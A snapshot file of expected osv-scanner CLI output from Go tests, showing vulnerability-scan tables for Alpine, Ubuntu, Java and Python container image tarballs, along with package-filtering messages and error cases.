[TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out#01 - 1] --- [TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out#01 - 2] at least one extractor must be enabled --- [TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out_with_presets - 1] --- [TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out_with_presets - 2] at least one extractor must be enabled --- [TestCommand_HtmlFile - 1] Scanning local image tarball "./testdata/test-alpine.tar" HTML output available at: /report.html --- [TestCommand_OCIImage/Alpine_3.10_image_tar_with_3.18_version_file - 1] Scanning local image tarball "./testdata/test-alpine.tar" Container Scanning Result (Alpine Linux v3.18) (Based on "alpine" image): Total 5 packages 
affected by 65 known vulnerabilities (6 Critical, 33 High, 26 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 65 vulnerabilities can be fixed. Alpine:v3.18 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | apk-tools | 2.10.6-r0 | Fix Available | 2 | apk-tools | # 3 Layer | -- | | busybox | 1.30.1-r5 | Fix Available | 19 | busybox, ssl_client | # 3 Layer | -- | | musl | 1.1.22-r4 | Fix Available | 3 | musl, musl-utils | # 3 Layer | -- | | openssl | 1.1.1k-r0 | Fix Available | 39 | libcrypto1.1... (2) | # 3 Layer | -- | | zlib | 1.2.11-r1 | Fix Available | 2 | zlib | # 3 Layer | -- | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. 
--- [TestCommand_OCIImage/Alpine_3.10_image_tar_with_3.18_version_file - 2] --- [TestCommand_OCIImage/Empty_Ubuntu_20.04_image_tar_with_no_vulns_shown - 1] Scanning local image tarball "./testdata/test-ubuntu-20-04.tar" Package Ubuntu:20.04/util-linux/1:2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/coreutils/8.30-3ubuntu2 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/dpkg/1.19.7ubuntu3.2 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/gcc-10/10.5.0-1ubuntu1~20.04 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/gnupg2/2.2.19-3ubuntu2.4 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/glibc/2.31-0ubuntu9.17 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/glibc/2.31-0ubuntu9.17 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/gcc-10/10.5.0-1ubuntu1~20.04 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/libgcrypt20/1.8.5-5ubuntu1.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/gnutls28/3.6.13-2ubuntu1.12 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/lz4/1.9.2-2ubuntu0.20.04.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test 
only unimportant vulns Package Ubuntu:20.04/ncurses/6.2-0ubuntu2.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/ncurses/6.2-0ubuntu2.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/pam/1.3.1-5ubuntu4.7 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/pam/1.3.1-5ubuntu4.7 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/pam/1.3.1-5ubuntu4.7 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/pam/1.3.1-5ubuntu4.7 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/pcre2/10.34-7ubuntu0.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/gcc-10/10.5.0-1ubuntu1~20.04 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/systemd/245.4-4ubuntu3.24 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/libtasn1-6/4.16.0-2ubuntu0.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/ncurses/6.2-0ubuntu2.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/systemd/245.4-4ubuntu3.24 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/shadow/1:4.8.1-1ubuntu5.20.04.5 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/ncurses/6.2-0ubuntu2.1 has been filtered out because: Just 
want to test only unimportant vulns Package Ubuntu:20.04/ncurses/6.2-0ubuntu2.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/shadow/1:4.8.1-1ubuntu5.20.04.5 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/perl/5.30.0-9ubuntu0.5 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/tar/1.30+dfsg-7ubuntu0.20.04.4 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/zlib/1:1.2.11.dfsg-2ubuntu1.5 has been filtered out because: Just want to test only unimportant vulns Filtered 38 ignored package/s from the scan. Container Scanning Result (Ubuntu 20.04.6 LTS) (Based on "ubuntu" image): Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. Hiding 1 number of vulnerabilities deemed unimportant, use --all-vulns to show them. For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. 
--- [TestCommand_OCIImage/Empty_Ubuntu_20.04_image_tar_with_no_vulns_shown - 2] --- [TestCommand_OCIImage/Empty_Ubuntu_20.04_image_tar_with_only_unimportant_vulns_shown - 1] Scanning local image tarball "./testdata/test-ubuntu-20-04.tar" Package Ubuntu:20.04/util-linux/1:2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/coreutils/8.30-3ubuntu2 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/dpkg/1.19.7ubuntu3.2 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/gcc-10/10.5.0-1ubuntu1~20.04 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/gnupg2/2.2.19-3ubuntu2.4 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/glibc/2.31-0ubuntu9.17 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/glibc/2.31-0ubuntu9.17 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/gcc-10/10.5.0-1ubuntu1~20.04 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/libgcrypt20/1.8.5-5ubuntu1.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/gnutls28/3.6.13-2ubuntu1.12 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/lz4/1.9.2-2ubuntu0.20.04.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: 
Just want to test only unimportant vulns Package Ubuntu:20.04/ncurses/6.2-0ubuntu2.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/ncurses/6.2-0ubuntu2.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/pam/1.3.1-5ubuntu4.7 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/pam/1.3.1-5ubuntu4.7 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/pam/1.3.1-5ubuntu4.7 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/pam/1.3.1-5ubuntu4.7 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/pcre2/10.34-7ubuntu0.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/gcc-10/10.5.0-1ubuntu1~20.04 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/systemd/245.4-4ubuntu3.24 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/libtasn1-6/4.16.0-2ubuntu0.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/ncurses/6.2-0ubuntu2.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/systemd/245.4-4ubuntu3.24 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/shadow/1:4.8.1-1ubuntu5.20.04.5 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/ncurses/6.2-0ubuntu2.1 has been filtered out 
because: Just want to test only unimportant vulns Package Ubuntu:20.04/ncurses/6.2-0ubuntu2.1 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/shadow/1:4.8.1-1ubuntu5.20.04.5 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/perl/5.30.0-9ubuntu0.5 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/tar/1.30+dfsg-7ubuntu0.20.04.4 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/util-linux/2.34-0.1ubuntu9.6 has been filtered out because: Just want to test only unimportant vulns Package Ubuntu:20.04/zlib/1:1.2.11.dfsg-2ubuntu1.5 has been filtered out because: Just want to test only unimportant vulns Filtered 38 ignored package/s from the scan. Container Scanning Result (Ubuntu 20.04.6 LTS) (Based on "ubuntu" image): Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. Filtered Vulnerabilities: +---------+--------------+--------------------+---------------------+----------------+ | PACKAGE | ECOSYSTEM | INSTALLED VERSION | FILTERED VULN COUNT | FILTER REASONS | +---------+--------------+--------------------+---------------------+----------------+ | pcre3 | Ubuntu:20.04 | 2:8.39-12ubuntu0.1 | 1 | Unimportant | +---------+--------------+--------------------+---------------------+----------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. 
--- [TestCommand_OCIImage/Empty_Ubuntu_20.04_image_tar_with_only_unimportant_vulns_shown - 2] --- [TestCommand_OCIImage/Empty_Ubuntu_22.04_image_tar - 1] Scanning local image tarball "./testdata/test-ubuntu.tar" Container Scanning Result (Ubuntu 22.04.5 LTS) (Based on "ubuntu" image): Total 22 packages affected by 48 known vulnerabilities (3 Critical, 14 High, 25 Medium, 3 Low, 3 Unknown) from 1 ecosystem. 24 vulnerabilities can be fixed. Ubuntu:22.04 +---------------------------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/var/lib/dpkg/status | +----------------+------------------------------+-------------------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+------------------------------+-------------------------+------------+-------------------------+------------------+---------------+ | coreutils | 8.32-4.1ubuntu1.2 | No fix available | 2 | coreutils | # 4 Layer | ubuntu | | dpkg | 1.21.1ubuntu2.3 | Partial fixes Available | 2 | dpkg | # 4 Layer | ubuntu | | gcc-12 | 12.3.0-1ubuntu1~22.04 | Partial fixes Available | 2 | gcc-12-base... (3) | # 4 Layer | ubuntu | | glibc | 2.35-0ubuntu3.8 | Fix Available | 3 | libc-bin, libc6 | # 4 Layer | ubuntu | | gnupg2 | 2.2.27-3ubuntu2.1 | Partial fixes Available | 5 | gpgv | # 4 Layer | ubuntu | | gnutls28 | 3.7.3-4ubuntu1.5 | Fix Available | 3 | libgnutls30 | # 4 Layer | ubuntu | | krb5 | 1.19.2-2ubuntu0.4 | Fix Available | 2 | libgssapi-krb5-2... 
(4) | # 4 Layer | ubuntu | | libcap2 | 1:2.44-1ubuntu0.22.04.1 | Fix Available | 1 | libcap2 | # 4 Layer | ubuntu | | libgcrypt20 | 1.9.4-3ubuntu3 | No fix available | 1 | libgcrypt20 | # 4 Layer | ubuntu | | libtasn1-6 | 4.18.0-4build1 | Fix Available | 2 | libtasn1-6 | # 4 Layer | ubuntu | | libzstd | 1.4.8+dfsg-3build1 | No fix available | 1 | libzstd1 | # 4 Layer | ubuntu | | lz4 | 1.9.3-2build2 | No fix available | 1 | liblz4-1 | # 4 Layer | ubuntu | | ncurses | 6.3-2ubuntu0.1 | No fix available | 2 | libncurses6... (5) | # 4 Layer | ubuntu | | openssl | 3.0.2-0ubuntu1.18 | Partial fixes Available | 6 | libssl3 | # 4 Layer | ubuntu | | pam | 1.4.0-11ubuntu2.5 | Partial fixes Available | 3 | libpam-modules... (4) | # 4 Layer | ubuntu | | pcre2 | 10.39-3ubuntu0.1 | No fix available | 1 | libpcre2-8-0 | # 4 Layer | ubuntu | | perl | 5.34.0-3ubuntu1.3 | Partial fixes Available | 3 | perl-base | # 4 Layer | ubuntu | | shadow | 1:4.8.1-2ubuntu2.2 | No fix available | 2 | login, passwd | # 4 Layer | ubuntu | | systemd | 249.11-0ubuntu3.12 | Partial fixes Available | 3 | libsystemd0... (2) | # 4 Layer | ubuntu | | tar | 1.34+dfsg-1ubuntu0.1.22.04.2 | No fix available | 1 | tar | # 4 Layer | ubuntu | | util-linux | 2.37.2-4ubuntu3.4 | Fix Available | 1 | libblkid1... (6) | # 4 Layer | ubuntu | | zlib | 1:1.2.11.dfsg-2ubuntu9.2 | No fix available | 1 | zlib1g | # 4 Layer | ubuntu | +----------------+------------------------------+-------------------------+------------+-------------------------+------------------+---------------+ Hiding 5 number of vulnerabilities deemed unimportant, use --all-vulns to show them. For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. 
--- [TestCommand_OCIImage/Empty_Ubuntu_22.04_image_tar - 2] --- [TestCommand_OCIImage/Empty_Ubuntu_22.04_image_tar_with_unimportant_vulns - 1] Scanning local image tarball "./testdata/test-ubuntu.tar" Container Scanning Result (Ubuntu 22.04.5 LTS) (Based on "ubuntu" image): Total 22 packages affected by 48 known vulnerabilities (3 Critical, 14 High, 25 Medium, 3 Low, 3 Unknown) from 1 ecosystem. 24 vulnerabilities can be fixed. Ubuntu:22.04 +---------------------------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/var/lib/dpkg/status | +----------------+------------------------------+-------------------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+------------------------------+-------------------------+------------+-------------------------+------------------+---------------+ | coreutils | 8.32-4.1ubuntu1.2 | No fix available | 2 | coreutils | # 4 Layer | ubuntu | | dpkg | 1.21.1ubuntu2.3 | Partial fixes Available | 2 | dpkg | # 4 Layer | ubuntu | | gcc-12 | 12.3.0-1ubuntu1~22.04 | Partial fixes Available | 2 | gcc-12-base... (3) | # 4 Layer | ubuntu | | glibc | 2.35-0ubuntu3.8 | Fix Available | 3 | libc-bin, libc6 | # 4 Layer | ubuntu | | gnupg2 | 2.2.27-3ubuntu2.1 | Partial fixes Available | 5 | gpgv | # 4 Layer | ubuntu | | gnutls28 | 3.7.3-4ubuntu1.5 | Fix Available | 3 | libgnutls30 | # 4 Layer | ubuntu | | krb5 | 1.19.2-2ubuntu0.4 | Fix Available | 2 | libgssapi-krb5-2... 
(4) | # 4 Layer | ubuntu | | libcap2 | 1:2.44-1ubuntu0.22.04.1 | Fix Available | 1 | libcap2 | # 4 Layer | ubuntu | | libgcrypt20 | 1.9.4-3ubuntu3 | No fix available | 1 | libgcrypt20 | # 4 Layer | ubuntu | | libtasn1-6 | 4.18.0-4build1 | Fix Available | 2 | libtasn1-6 | # 4 Layer | ubuntu | | libzstd | 1.4.8+dfsg-3build1 | No fix available | 1 | libzstd1 | # 4 Layer | ubuntu | | lz4 | 1.9.3-2build2 | No fix available | 1 | liblz4-1 | # 4 Layer | ubuntu | | ncurses | 6.3-2ubuntu0.1 | No fix available | 2 | libncurses6... (5) | # 4 Layer | ubuntu | | openssl | 3.0.2-0ubuntu1.18 | Partial fixes Available | 6 | libssl3 | # 4 Layer | ubuntu | | pam | 1.4.0-11ubuntu2.5 | Partial fixes Available | 3 | libpam-modules... (4) | # 4 Layer | ubuntu | | pcre2 | 10.39-3ubuntu0.1 | No fix available | 1 | libpcre2-8-0 | # 4 Layer | ubuntu | | perl | 5.34.0-3ubuntu1.3 | Partial fixes Available | 3 | perl-base | # 4 Layer | ubuntu | | shadow | 1:4.8.1-2ubuntu2.2 | No fix available | 2 | login, passwd | # 4 Layer | ubuntu | | systemd | 249.11-0ubuntu3.12 | Partial fixes Available | 3 | libsystemd0... (2) | # 4 Layer | ubuntu | | tar | 1.34+dfsg-1ubuntu0.1.22.04.2 | No fix available | 1 | tar | # 4 Layer | ubuntu | | util-linux | 2.37.2-4ubuntu3.4 | Fix Available | 1 | libblkid1... 
(6) | # 4 Layer | ubuntu | | zlib | 1:1.2.11.dfsg-2ubuntu9.2 | No fix available | 1 | zlib1g | # 4 Layer | ubuntu | +----------------+------------------------------+-------------------------+------------+-------------------------+------------------+---------------+ Filtered Vulnerabilities: +---------+--------------+--------------------------+---------------------+----------------+ | PACKAGE | ECOSYSTEM | INSTALLED VERSION | FILTERED VULN COUNT | FILTER REASONS | +---------+--------------+--------------------------+---------------------+----------------+ | glibc | Ubuntu:22.04 | 2.35-0ubuntu3.8 | 1 | Unimportant | | krb5 | Ubuntu:22.04 | 1.19.2-2ubuntu0.4 | 2 | Unimportant | | pcre3 | Ubuntu:22.04 | 2:8.39-13ubuntu0.22.04.1 | 1 | Unimportant | | perl | Ubuntu:22.04 | 5.34.0-3ubuntu1.3 | 1 | Unimportant | +---------+--------------+--------------------------+---------------------+----------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/Empty_Ubuntu_22.04_image_tar_with_unimportant_vulns - 2] --- [TestCommand_OCIImage/Invalid_path - 1] Scanning local image tarball "../../testdata/locks-manyoci-image/no-file-here.tar" --- [TestCommand_OCIImage/Invalid_path - 2] failed to load image from tarball with path "../../testdata/locks-manyoci-image/no-file-here.tar": open ../../testdata/locks-manyoci-image/no-file-here.tar: no such file or directory --- [TestCommand_OCIImage/Scanning_Ubuntu_image_with_go_OS_packages_json - 1] Scanning local image tarball "./testdata/test-ubuntu-with-packages.tar" Container Scanning Result (Ubuntu 22.04.5 LTS) (Based on "ubuntu" image): Total 22 packages affected by 48 known vulnerabilities (3 Critical, 14 High, 25 Medium, 3 Low, 3 Unknown) from 1 ecosystem. 24 vulnerabilities can be fixed. 
Ubuntu:22.04 +---------------------------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/var/lib/dpkg/status | +----------------+------------------------------+-------------------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+------------------------------+-------------------------+------------+-------------------------+------------------+---------------+ | coreutils | 8.32-4.1ubuntu1.2 | No fix available | 2 | coreutils | # 4 Layer | ubuntu | | dpkg | 1.21.1ubuntu2.3 | Partial fixes Available | 2 | dpkg | # 4 Layer | ubuntu | | gcc-12 | 12.3.0-1ubuntu1~22.04 | Partial fixes Available | 2 | gcc-12-base... (3) | # 4 Layer | ubuntu | | glibc | 2.35-0ubuntu3.8 | Fix Available | 3 | libc-bin, libc6 | # 4 Layer | ubuntu | | gnupg2 | 2.2.27-3ubuntu2.1 | Partial fixes Available | 5 | gpgv | # 4 Layer | ubuntu | | gnutls28 | 3.7.3-4ubuntu1.5 | Fix Available | 3 | libgnutls30 | # 4 Layer | ubuntu | | krb5 | 1.19.2-2ubuntu0.4 | Fix Available | 2 | libgssapi-krb5-2... (4) | # 4 Layer | ubuntu | | libcap2 | 1:2.44-1ubuntu0.22.04.1 | Fix Available | 1 | libcap2 | # 4 Layer | ubuntu | | libgcrypt20 | 1.9.4-3ubuntu3 | No fix available | 1 | libgcrypt20 | # 4 Layer | ubuntu | | libtasn1-6 | 4.18.0-4build1 | Fix Available | 2 | libtasn1-6 | # 4 Layer | ubuntu | | libzstd | 1.4.8+dfsg-3build1 | No fix available | 1 | libzstd1 | # 4 Layer | ubuntu | | lz4 | 1.9.3-2build2 | No fix available | 1 | liblz4-1 | # 4 Layer | ubuntu | | ncurses | 6.3-2ubuntu0.1 | No fix available | 2 | libncurses6... (5) | # 4 Layer | ubuntu | | openssl | 3.0.2-0ubuntu1.18 | Partial fixes Available | 6 | libssl3 | # 4 Layer | ubuntu | | pam | 1.4.0-11ubuntu2.5 | Partial fixes Available | 3 | libpam-modules... 
(4) | # 4 Layer | ubuntu | | pcre2 | 10.39-3ubuntu0.1 | No fix available | 1 | libpcre2-8-0 | # 4 Layer | ubuntu | | perl | 5.34.0-3ubuntu1.3 | Partial fixes Available | 3 | perl-base | # 4 Layer | ubuntu | | shadow | 1:4.8.1-2ubuntu2.2 | No fix available | 2 | login, passwd | # 4 Layer | ubuntu | | systemd | 249.11-0ubuntu3.12 | Partial fixes Available | 3 | libsystemd0... (2) | # 4 Layer | ubuntu | | tar | 1.34+dfsg-1ubuntu0.1.22.04.2 | No fix available | 1 | tar | # 4 Layer | ubuntu | | util-linux | 2.37.2-4ubuntu3.4 | Fix Available | 1 | libblkid1... (6) | # 4 Layer | ubuntu | | zlib | 1:1.2.11.dfsg-2ubuntu9.2 | No fix available | 1 | zlib1g | # 4 Layer | ubuntu | +----------------+------------------------------+-------------------------+------------+-------------------------+------------------+---------------+ Hiding 5 number of vulnerabilities deemed unimportant, use --all-vulns to show them. For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/Scanning_Ubuntu_image_with_go_OS_packages_json - 2] --- [TestCommand_OCIImage/Scanning_java_image_with_some_packages - 1] Scanning local image tarball "./testdata/test-java-full.tar" Container Scanning Result (Alpine Linux v3.21) (Based on "eclipse-temurin" image): Total 25 packages affected by 73 known vulnerabilities (4 Critical, 29 High, 35 Medium, 4 Low, 1 Unknown) from 2 ecosystems. 73 vulnerabilities can be fixed. 
Maven +-------------------------------------------------------------------------------------------------------------------------------+ | Source:artifact:/app/target.jar | +-------------------------------------------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +-------------------------------------------+-------------------+---------------+------------+------------------+---------------+ | com.fasterxml.jackson.core:jackson-core | 2.10.2 | Fix Available | 3 | # 12 Layer | -- | | com.google.protobuf:protobuf-java | 3.21.12 | Fix Available | 1 | # 12 Layer | -- | | com.nimbusds:nimbus-jose-jwt | 9.31 | Fix Available | 2 | # 12 Layer | -- | | commons-beanutils:commons-beanutils | 1.9.4 | Fix Available | 1 | # 12 Layer | -- | | dnsjava:dnsjava | 3.4.0 | Fix Available | 1 | # 12 Layer | -- | | io.netty:netty-codec | 4.1.100.Final | Fix Available | 1 | # 12 Layer | -- | | io.netty:netty-codec-http | 4.1.100.Final | Fix Available | 3 | # 12 Layer | -- | | io.netty:netty-codec-http2 | 4.1.100.Final | Fix Available | 1 | # 12 Layer | -- | | io.netty:netty-codec-smtp | 4.1.100.Final | Fix Available | 1 | # 12 Layer | -- | | io.netty:netty-common | 4.1.100.Final | Fix Available | 2 | # 12 Layer | -- | | io.netty:netty-handler | 4.1.100.Final | Fix Available | 1 | # 12 Layer | -- | | org.apache.avro:avro | 1.9.2 | Fix Available | 2 | # 12 Layer | -- | | org.apache.commons:commons-compress | 1.21 | Fix Available | 2 | # 12 Layer | -- | | org.apache.commons:commons-configuration2 | 2.8.0 | Fix Available | 2 | # 12 Layer | -- | | org.apache.commons:commons-lang3 | 3.12.0 | Fix Available | 1 | # 12 Layer | -- | | org.eclipse.jetty:jetty-http | 9.4.53.v20231009 | Fix Available | 2 | # 12 Layer | -- | +-------------------------------------------+-------------------+---------------+------------+------------------+---------------+ Alpine:v3.21 
+-----------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+----------------------------+------------------+-----------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+----------------------------+------------------+-----------------+ | busybox | 1.37.0-r9 | Fix Available | 2 | busybox... (3) | # 0 Layer | alpine | | expat | 2.6.4-r0 | Fix Available | 6 | libexpat | # 5 Layer | eclipse-temurin | | gnupg | 2.4.7-r0 | Fix Available | 2 | gnupg... (11) | # 5 Layer | eclipse-temurin | | gnutls | 3.8.8-r0 | Fix Available | 7 | gnutls | # 5 Layer | eclipse-temurin | | libpng | 1.6.44-r0 | Fix Available | 8 | libpng | # 5 Layer | eclipse-temurin | | libtasn1 | 4.19.0-r2 | Fix Available | 2 | libtasn1 | # 5 Layer | eclipse-temurin | | musl | 1.2.5-r8 | Fix Available | 1 | musl, musl-utils | # 0 Layer | alpine | | openssl | 3.3.2-r4 | Fix Available | 15 | libcrypto3, libssl3... (3) | # 0 Layer | alpine | | sqlite | 3.47.1-r0 | Fix Available | 4 | sqlite-libs | # 5 Layer | eclipse-temurin | +----------------+-------------------+---------------+------------+----------------------------+------------------+-----------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. 
--- [TestCommand_OCIImage/Scanning_java_image_with_some_packages - 2] --- [TestCommand_OCIImage/Scanning_python_image_with_no_packages - 1] Scanning local image tarball "./testdata/test-python-empty.tar" Container Scanning Result (Debian GNU/Linux 10 (buster)) (Based on "python" image): Total 15 packages affected by 27 known vulnerabilities (0 Critical, 7 High, 4 Medium, 2 Low, 14 Unknown) from 2 ecosystems. 27 vulnerabilities can be fixed. PyPI +---------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/ensurepip/_bundled/pip-23.0.1-py3-none-any.whl | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | pip | 23.0.1 | Fix Available | 3 | # 7 Layer | python | +---------+-------------------+---------------+------------+------------------+---------------+ +------------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/ensurepip/_bundled/setuptools-58.1.0-py3-none-any.whl | +------------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +------------+-------------------+---------------+------------+------------------+---------------+ | setuptools | 58.1.0 | Fix Available | 3 | # 7 Layer | python | +------------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/pip-23.0.1.dist-info/METADATA | 
